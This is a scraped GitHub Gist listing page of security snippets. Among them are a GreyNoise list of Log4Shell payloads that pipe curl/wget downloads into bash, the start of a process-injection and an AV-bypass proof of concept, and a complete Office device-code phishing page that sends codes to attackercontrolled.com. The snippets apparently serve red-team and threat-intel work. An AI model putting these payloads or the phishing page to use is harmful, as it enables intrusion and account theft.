Skip to content

Instantly share code, notes, and snippets.

@aconite33
aconite33 / bloodhoundce_import.py
Created August 15, 2023 23:04
Import large files into BloodHound CE Edition
import requests
import json
import time
import argparse
import getpass
import os
import sys
def main():
@mgeeky
mgeeky / Cleanup-ClickOnce.ps1
Last active March 18, 2024 16:05
Cleanup-ClickOnce.ps1 - Simple Powershell script that removes ClickOnce deployments entirely from file system and registry. Attempts to remove both installed and online-only deployments.
#
# Simple Powershell script that removes ClickOnce deployments entirely from file system and registry.
# Attempts to remove both installed and online-only deployments.
#
# Authored: Mariusz Banach / mgeeky, <mb [at] binary-offensive.com>
#
# Usage:
# PS> . .\Cleanup-ClickOnce.ps1
# PS> Cleanup-ClickOnce -Name MyAppName
#
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created August 11, 2021 18:07
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
@Acebond
Acebond / bh_split2.py
Last active October 3, 2023 17:39
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations.
#!/usr/bin/python3
# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
# pip install simplejson
import simplejson
import sys
def splitfile(file_name, object_limit):
print(f"[*] Loading {file_name}")
with open(file_name) as f:
data = simplejson.load(f)
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@fkraeutli
fkraeutli / downloadGitLfsFiles.md
Last active July 17, 2024 18:59
How to download GIT LFS files

How to retrieve GIT LFS files from GitHub

Retrieving non-LFS files

Through the GitHub API it is possible to retrieve individual files from a Git repository via, e.g. curl. To do so, first retrieve the content information for the relevant file (or folder):

curl https://api.github.com/repos/{organisation}/{repository}/contents/{file or folder path}

For private repositories, authenticate using your username and a personal access token

@jfmaes
jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@Mr-Un1k0d3r
Mr-Un1k0d3r / generate.html
Last active January 18, 2024 21:55
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@mrpeardotnet
mrpeardotnet / PVE-HP-ssacli-smart-storage-admin.md
Created November 25, 2019 22:10
HP Smart Storage Admin CLI (ssacli) installation and usage on Proxmox PVE (6.x)

HP Smart Storage Admin CLI (ssacli) installation and usage on Proxmox PVE (6.x)

Why use HP Smart Storage Admin CLI?

You can use ssacli (smart storage administrator command line interface) tool to manage any of supported HP Smart Array Controllers in your Proxmox host without need to reboot your server to access Smart Storage Administrator in BIOS. That means no host downtime when managing your storage.

CLI is not as convenient as GUI interface provided by BIOS or desktop utilities, but still allows you to fully manage your controller, physical disks and logical drives on the fly with no Proxmox host downtime.

ssacli replaces older hpssacli, but shares the same syntax and adds support for newer servers and controllers.

Installation